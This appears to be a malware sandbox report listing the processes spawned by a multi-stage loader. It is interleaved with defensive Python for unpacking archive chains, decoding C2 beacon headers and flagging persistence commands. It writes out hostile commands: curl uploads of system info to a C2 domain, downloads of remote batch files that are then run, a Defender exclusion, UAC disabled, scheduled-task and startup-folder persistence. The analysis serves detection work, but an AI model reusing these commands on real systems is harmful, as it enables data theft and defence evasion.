PID 4804 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 3088 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3088 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted
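The eight 7z.exe invocations above peel one archive layer per call (file.zip, then extracted/file_7.zip down to file_1.zip) before the dropped in.exe runs. The following is an added example for this report, not code from the sample or the sandbox, that walks such a chain from memory while hashing every layer, capping nesting depth and capping total decompressed size. It uses Python's zipfile, so it only opens ZipCrypto-protected members; 7-Zip can also produce AES-encrypted zips, which need 7z itself. The nested archive it unpacks is constructed inline, and the member names (file_N.zip, in.exe) mirror the ones on this page.

```python
"""Unpack a nested archive chain layer by layer with per-layer SHA256, a depth
limit and a decompression-size cap. Added example; not the sample's own code."""
import hashlib
import io
import zipfile
from typing import List, Optional, Tuple

MAX_DEPTH = 16                        # the sample uses 8 layers; refuse runaway nesting
MAX_TOTAL_BYTES = 64 * 1024 * 1024    # decompression-bomb guard (assumed budget)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def unpack_chain(outer: bytes, pwd: Optional[bytes] = None) -> List[Tuple[int, str, str]]:
    """Return [(depth, member_name, sha256)] for every blob reached.

    Each member that is itself a zip is opened in turn; the first non-zip
    member (the dropped executable) terminates that branch. `pwd` applies to
    the outermost layer only, matching the -p<password> on file.zip above.
    """
    layers: List[Tuple[int, str, str]] = []
    total = 0
    stack = [(0, 'file.zip', outer)]
    while stack:
        depth, name, blob = stack.pop()
        layers.append((depth, name, sha256(blob)))
        if depth >= MAX_DEPTH or not zipfile.is_zipfile(io.BytesIO(blob)):
            continue
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                total += info.file_size          # uncompressed size from the header
                if total > MAX_TOTAL_BYTES:
                    raise ValueError('decompression cap exceeded at %s' % info.filename)
                data = zf.read(info, pwd=pwd if depth == 0 else None)
                stack.append((depth + 1, info.filename, data))
    return layers


def build_sample_chain(layers: int = 3, payload: bytes = b'MZ fake payload') -> bytes:
    """Constructed input: `payload` wrapped as in.exe inside file_1.zip inside
    file_2.zip ... inside the returned outer archive (stands in for file.zip)."""
    blob, name = payload, 'in.exe'
    for i in range(1, layers + 1):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, blob)
        blob, name = buf.getvalue(), 'file_%d.zip' % i
    return blob


if __name__ == '__main__':
    for depth, name, digest in unpack_chain(build_sample_chain(3)):
        print('%s%s %s' % ('  ' * depth, name, digest))
```

Hashing each layer is what lets the intermediate archives be matched against other submissions even when only the outer file is shared; the size cap matters because a loader chain is exactly where a decompression bomb would be placed.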

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\L68Y5XTJ5XBA" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
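The curl beacons above carry two custom headers whose values are hex-encoded ASCII: X-Referer decodes to the path of the process that sent the beacon (C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe) and X-Auth to a host/user/identifier string (/OFGADUSE/Admin/2), while X-Sec-Id is a small step counter (0 after the systeminfo/tasklist upload, 3 for the tmp.ini download, 1 after running tmp.bat). The parser below is an added example written for this report, not code from the sample; the meaning assigned to each header is inferred from the decoded values, and the user-agent string in the constructed input is shortened from the one on the page.

```python
"""Parse the curl beacon command lines from this report and decode their
hex-encoded headers. Added example; not part of the sandbox output."""
import re
from typing import Dict, List

# Constructed input: the first upload and the first download line, copied from
# the process list above with the user-agent shortened.
SAMPLE_CMDLINES = [
    r'curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" '
    r'-H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" '
    r'-X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" '
    r'--data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"',
    r'curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" '
    r'-H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" '
    r'-H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" '
    r'-Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"',
]

HEADER_RE = re.compile(r'-H\s+"([^":]+):\s*([^"]*)"')   # -H "Name: value"
URL_RE = re.compile(r'"(https?://[^"]+)"')
HEX_RE = re.compile(r'^(?:[0-9A-Fa-f]{2})+$')


def decode_hex_header(value: str) -> str:
    """Return the ASCII text behind an all-hex header value; anything that is
    not even-length hex, or decodes to non-printable bytes, is returned as-is."""
    if HEX_RE.match(value):
        text = bytes.fromhex(value).decode('ascii', errors='replace')
        if text.isprintable():
            return text
    return value


def parse_beacon(cmdline: str) -> Dict[str, object]:
    """Extract URL, HTTP method, data direction, TLS posture and decoded headers
    from one curl command line as logged by the sandbox."""
    headers = {name: decode_hex_header(val) for name, val in HEADER_RE.findall(cmdline)}
    url = URL_RE.search(cmdline)
    if '--data-binary' in cmdline or ' -d ' in cmdline:
        direction = 'upload'            # file contents sent to the C2
    elif re.search(r'\s-L?o\s', cmdline):
        direction = 'download'          # response written to disk (-o / -Lo)
    else:
        direction = 'request'
    return {
        'url': url.group(1) if url else None,
        'method': 'POST' if re.search(r'\s-X\s+POST\b', cmdline) else 'GET',
        'direction': direction,
        'insecure_tls': '--insecure' in cmdline or re.search(r'\s-k\s', cmdline) is not None,
        'headers': headers,
    }


def beacon_report(cmdlines: List[str]) -> List[Dict[str, object]]:
    return [parse_beacon(c) for c in cmdlines]


if __name__ == '__main__':
    for entry in beacon_report(SAMPLE_CMDLINES):
        print(entry['method'], entry['direction'], entry['url'])
        for name, value in entry['headers'].items():
            print('   ', name, '=', value)
```

The decoded X-Referer is worth keeping as an indicator in its own right: it is the on-disk name of the stage that beaconed, which changes between drops even when the domain and header names do not.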

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9HVSRQ90HDJM" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp4E57.tmp"
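Several of the command lines in this list are the kind a detection engineer would want to catch on a host rather than in a sandbox: a scheduled task that runs a binary out of AppData every minute, a scheduled task registered to run as SYSTEM at start-up, a Defender exclusion added with Add-MpPreference, EnableLUA set to 0 to switch off UAC prompts, a copy of the stage dropped into the Startup folder with `type ... >`, a PFX imported silently with certutil, and attrib +H +S on a dropped file. The rule set below is an added example written from the command lines on this page, not a vendor signature set and not part of the report; the MITRE technique labels are my mapping. The sample input is constructed from lines in this list plus two benign lines from the same list as controls.

```python
"""Flag persistence and defence-evasion command lines seen in this process
list. Added illustrative rules; not a vendor signature set."""
import re
from typing import List, Tuple

# Constructed input: command lines copied from the process list above, the
# last two being benign controls from the same list.
SAMPLE_CMDLINES = [
    r'schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE',
    r'powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"',
    r'C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"',
    r'"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp4E57.tmp"',
    r'attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe',
    r'schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart',
    r'"C:\Windows\system32\PING.EXE" 127.0.0.1',
    r'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule',
]

# Locations an unprivileged user can write to; used to tighten the noisier rules.
USER_WRITABLE = re.compile(r'\\(?:AppData|ProgramData|Users\\Public)\\', re.I)

# (rule name, MITRE technique, pattern, also require a user-writable path?)
RULES: List[Tuple[str, str, 're.Pattern[str]', bool]] = [
    ('schtasks_user_writable_target', 'T1053.005',
     re.compile(r'schtasks(?:\.exe)?"?\s.*/create\b', re.I), True),
    ('schtasks_run_as_system', 'T1053.005',
     re.compile(r'schtasks(?:\.exe)?"?\s.*/create\b.*/ru\s+system\b', re.I), False),
    ('defender_exclusion_added', 'T1562.001',
     re.compile(r'Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b', re.I), False),
    ('uac_disabled_enablelua', 'T1548.002',
     re.compile(r'\breg(?:\.exe)?\s+add\s+.*\\Policies\\System\b.*/v\s+EnableLUA\b.*/d\s+0\b', re.I), False),
    ('startup_folder_drop', 'T1547.001',
     re.compile(r'\\Start Menu\\Programs\\Startup\\', re.I), False),
    ('certutil_importpfx', 'T1553',
     re.compile(r'certutil(?:\.exe)?"?\s.*-importpfx\b', re.I), False),
    ('attrib_hide_user_writable', 'T1564.001',
     re.compile(r'attrib(?:\.exe)?"?\s.*\+[hs]\b', re.I), True),
]


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule that fires on one command line."""
    hits = []
    for name, _technique, pattern, needs_user_path in RULES:
        if pattern.search(cmdline) and (not needs_user_path or USER_WRITABLE.search(cmdline)):
            hits.append(name)
    return hits


def scan(cmdlines: List[str]) -> List[List[str]]:
    """Rule hits per input line, in input order (empty list = nothing fired)."""
    return [match_rules(c) for c in cmdlines]


if __name__ == '__main__':
    for cmd, hits in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        print(hits or ['-'], cmd[:90])
```

The user-writable-path requirement on the schtasks and attrib rules is what keeps legitimate installers and administrators out of the alert queue; the SYSTEM-task rule deliberately has no path condition because a task under a Microsoft-looking path such as Microsoft\Windows\CertificateServicesClient pointing at SysWOW64\ruts\rutserv.exe is exactly the case it needs to catch.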

